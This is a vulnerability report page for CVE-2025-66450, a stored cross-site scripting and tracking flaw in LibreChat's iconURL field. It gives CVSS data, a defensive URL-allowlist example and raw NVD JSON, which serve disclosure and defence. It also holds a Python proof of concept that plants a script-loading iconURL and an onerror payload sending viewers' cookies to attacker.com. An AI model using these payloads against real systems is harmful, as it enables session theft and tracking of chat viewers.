Security Vulnerability Report
CVE-2025-66450 CVSS 5.4 MEDIUM

CVE-2025-66450

Published: 2025-12-11 22:15:56
Last Modified: 2025-12-15 17:57:48

Description

LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, when a user posts a question, the iconURL parameter of the POST request can be modified by an attacker. The malicious code is then stored in the chat which can then be shared to other users. When sharing chats with a potentially malicious “tracker”, resources loaded can lead to loss of privacy for users who view the chat link that is sent to them. This issue is fixed in version 0.8.1.
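The mechanism in the description is a stored, attacker-controlled URL: the iconURL value is saved with the message and later rendered (as an image source) for every user who opens the shared chat, so pointing it off-origin makes each viewer's browser contact the attacker's host, which is the "tracker" the advisory refers to. The following is an added example, not LibreChat's code and not its 0.8.1 fix, of the kind of allowlist check a server should apply to such a field before storing or rendering it, together with an audit pass over stored messages that flags values which would already make viewers fetch a third-party resource. The host allowlist, the message field names and the sample records are assumptions constructed for the example.

```javascript
// Added example, not LibreChat code: allowlist an avatar/icon URL before it is
// stored or rendered, then audit stored messages for values that would have
// made viewers' browsers fetch an attacker-controlled resource.

// Hypothetical allowlist: the deployment's own origin and its image CDN.
const ALLOWED_ICON_HOSTS = new Set(["chat.example.org", "cdn.example.org"]);

/**
 * Return a normalised iconURL that is safe to render as <img src>, or null.
 * Accepted: a same-origin path ("/images/x.png") or an https URL whose host is
 * on the allowlist. Rejected: data:, javascript:, blob:, http:, protocol-relative
 * "//host" and "/\host" forms, URLs carrying credentials, and off-origin hosts.
 */
function sanitizeIconURL(raw, allowedHosts = ALLOWED_ICON_HOSTS) {
  if (typeof raw !== "string") return null;
  const value = raw.trim();
  if (value.length === 0 || value.length > 2048) return null;
  if (/[\u0000-\u001f\u007f]/.test(value)) return null; // control characters

  // Same-origin relative path. "//host" is protocol-relative, and browsers
  // treat "\" like "/" in http(s) URLs, so "/\host" is protocol-relative too.
  if (value.startsWith("/")) {
    return /^\/[\/\\]/.test(value) ? null : value;
  }

  let parsed;
  try {
    parsed = new URL(value); // an absolute URL is required from here on
  } catch {
    return null;
  }
  if (parsed.protocol !== "https:") return null;
  if (parsed.username !== "" || parsed.password !== "") return null;
  // URL parsing has already lowercased the hostname.
  if (!allowedHosts.has(parsed.hostname)) return null;
  return parsed.href;
}

/**
 * Audit stored messages and return the ones whose iconURL fails the allowlist,
 * i.e. messages that, once shared, would make viewers contact a third party.
 */
function findSuspiciousIcons(messages, allowedHosts = ALLOWED_ICON_HOSTS) {
  return messages
    .filter((m) => typeof m.iconURL === "string" && m.iconURL !== "")
    .filter((m) => sanitizeIconURL(m.iconURL, allowedHosts) === null)
    .map(({ messageId, conversationId, iconURL }) => ({ messageId, conversationId, iconURL }));
}

// Constructed sample records (not real data); the field names are assumptions.
const SAMPLE_MESSAGES = [
  { messageId: "m1", conversationId: "c1", iconURL: "/images/assistant.png" },
  { messageId: "m2", conversationId: "c1", iconURL: "https://cdn.example.org/icons/gpt.png" },
  { messageId: "m3", conversationId: "c2", iconURL: "https://attacker.example/tracker.png?cid=c2" },
  { messageId: "m4", conversationId: "c2", iconURL: "data:text/html,<script src=https://attacker.example/t.js></script>" },
  { messageId: "m5", conversationId: "c3", iconURL: "//attacker.example/pixel.gif" },
  { messageId: "m6", conversationId: "c3", text: "no icon at all" },
];

for (const hit of findSuspiciousIcons(SAMPLE_MESSAGES)) {
  console.log(`[!] ${hit.conversationId}/${hit.messageId}: ${hit.iconURL}`);
}
```

Run with `node` to list the three flagged records (m3, m4, m5). The same-origin branch deliberately refuses anything that starts with two slash-like characters because a value such as `/\attacker.example/pixel.gif`, when resolved against the page origin, becomes `https://attacker.example/pixel.gif`; a check that only looks for `//` misses it. Normalising through `URL` also strips userinfo tricks like `https://cdn.example.org@attacker.example/`, where a string-prefix comparison on the allowlisted host would pass.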

CVSS Details

CVSS 3.1 (primary scoring, used in the page banner)
Score: 5.4
Severity: MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CVSS 4.0 (secondary scoring)
Score: 8.6
Severity: HIGH
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N

The two scorings disagree on privileges required (PR:L in 3.1 versus PR:N in 4.0) and on the severity of the confidentiality and integrity impact; the banner reflects the 3.1 score.

Weakness
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

Configurations (Affected Products)

cpe:2.3:a:librechat:librechat:*:*:*:*:*:*:*:* - VULNERABLE
LibreChat <= 0.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json

import requests

# CVE-2025-66450 PoC - LibreChat Stored XSS via iconURL
# Target: LibreChat <= 0.8.0 (fixed in 0.8.1)
#
# The endpoint path, request fields, token and conversation id below are
# placeholders and must match the target deployment's API before running.

TARGET_URL = "http://target-server/api/messages/send"
ATTACKER_CONTROLLED_URL = "https://attacker.com/tracker.js"
USER_TOKEN = "<user_token>"            # bearer token of the attacker's own account
CONVERSATION_ID = "<conversation_id>"  # conversation that will later be shared

# Alternative payload, kept for reference and not sent by this script: a broken
# image whose error handler exfiltrates the viewer's cookies and page URL. It
# only works where the target renders the field it lands in as unescaped HTML.
ALT_IMG_PAYLOAD = """
<img src=x onerror="
    fetch('https://attacker.com/log?cookie='+document.cookie+'&url='+window.location.href)
">
"""


def exploit_stored_xss(target_url, attacker_url, token=USER_TOKEN,
                       conversation_id=CONVERSATION_ID):
    """
    Exploit Stored XSS in the iconURL parameter.

    Posts a message whose iconURL points at attacker-controlled content, so it
    is stored with the chat and loaded by whoever opens the shared chat link.
    The advisory describes the impact as viewers' browsers fetching an
    attacker-hosted resource (a "tracker"); whether a data: URL in this field
    also executes script depends on how the client renders it.
    """
    payload_data = {
        "text": "Check out this chat!",
        # iconURL is the attacker-controlled field: a data: URL that pulls in
        # the external script when the message is rendered.
        "iconURL": f"data:text/html,<script src={attacker_url}></script>",
        "conversationId": conversation_id,
    }
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {token}",
    }

    print(f"[*] Sending malicious payload to {target_url}")
    print(f"[*] Payload: {json.dumps(payload_data, indent=2)}")
    try:
        response = requests.post(target_url, json=payload_data, headers=headers, timeout=15)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

    print(f"[*] Response Status: {response.status_code}")
    if response.status_code == 200:
        print("[+] Malicious chat created successfully")
        print("[*] When a victim views this chat, tracker.js will be loaded")
        return True
    return False


if __name__ == "__main__":
    exploit_stored_xss(TARGET_URL, ATTACKER_CONTROLLED_URL)
```

References

https://github.com/danny-avila/LibreChat/security/advisories/GHSA-84vx-vmcf-xgpp (Exploit, Vendor Advisory)
https://github.com/danny-avila/LibreChat/commit/6fa94d3eb8f5779363226d10dccf8b01a735744c (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66450", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:56.153", "lastModified": "2025-12-15T17:57:48.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, when a user posts a question, the iconURL parameter of the POST request can be modified by an attacker. The malicious code is then stored in the chat which can then be shared to other users. When sharing chats with a potentially malicious “tracker”, resources loaded can lead to loss of privacy for users who view the chat link that is sent to them. This issue is fixed in version 0.8.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.8.1", "matchCriteriaId": "9C781B65-3680-4762-9FEB-F404DDA1810C"}]}]}], "references": [{"url": "https://github.com/danny-avila/LibreChat/commit/6fa94d3eb8f5779363226d10dccf8b01a735744c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-84vx-vmcf-xgpp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}